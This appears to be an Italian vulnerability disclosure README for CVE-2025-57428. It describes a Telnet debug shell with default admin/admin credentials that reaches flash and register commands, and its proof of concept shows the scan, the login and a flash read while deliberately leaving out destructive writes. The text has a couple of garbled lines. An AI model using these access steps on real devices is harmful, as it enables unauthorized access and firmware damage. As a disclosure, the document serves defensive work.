
CVE-2025-57428
⚠️ Questo repository è mantenuto solo come riferimento per CVE-2025-57428.
Per altri advisory e aggiornamenti, consultare: security-advisories.
Questo dispositivo espone un'interfaccia di debug Telnet (abilitata per impostazione predefinita sulla porta 23) e accetta credenziali di amministratore (`admin`/`admin` per impostazione predefinita). Dopo l'autenticazione, la shell fornisce accesso diretto a comandi di basso livello (in particolare `spi` e `reg`), che possono portare a corruzione arbitraria del firmware, brick del dispositivo e perdita di funzionalità o configurazione di sicurezza.
Nota: Ometto intenzionalmente i comandi che eseguono scritture distruttive. La PoC seguente conferma l'esistenza e l'accessibilità dell'interfaccia senza fornire un exploit pronto per l'uso.
Scansiona il dispositivo sulla LAN:
nmap -p 23 <device-ip>
Risultato: la porta 23 (telnet) mostra open.
Connettersi tramite Telnet e autenticarsi (credenziali predefinite):
telnet <device-ip>
# Login as: admin
# Password: admin
Dopo il login, viene presentato un prompt di debug CMD>.
Elenca i comandi disponibili:
CMD>help
L'output di help mostra i seguenti menu:
cfg net os
Entra nel menu os:
CMD>os
Elenca di nuovo i comandi disponibili:
OS>help
Questa volta l'output di help mostra i seguenti comandi:
thread mem spi reg cpuload cpubusy event
Usando viene mostrato .
Osservazioni:
I tentativi di trovare un contatto per la sicurezza o un canale di supporto del venditore originale non hanno avuto successo. Il prodotto sembra essere un dispositivo rebranded di origine sconosciuta.
Queste informazioni sono fornite solo a scopo educativo e difensivo. L'autore non si assume alcuna responsabilità per l'uso improprio di queste informazioni.
spispi <rd/wr/er> <addr> [len]Leggi la memoria flash:
OS>spi rd 0x000fd0f0 16
Questo restituisce un dump esadecimale della regione flash:
4f30650a 938f56fa 1b663a19 e316d824
Questo conferma che il comando funziona e che la shell ha accesso di basso livello.
Anche il comando di scrittura (spi wr) e il comando di cancellazione (spi er), così come i comandi reg, sono eseguibili.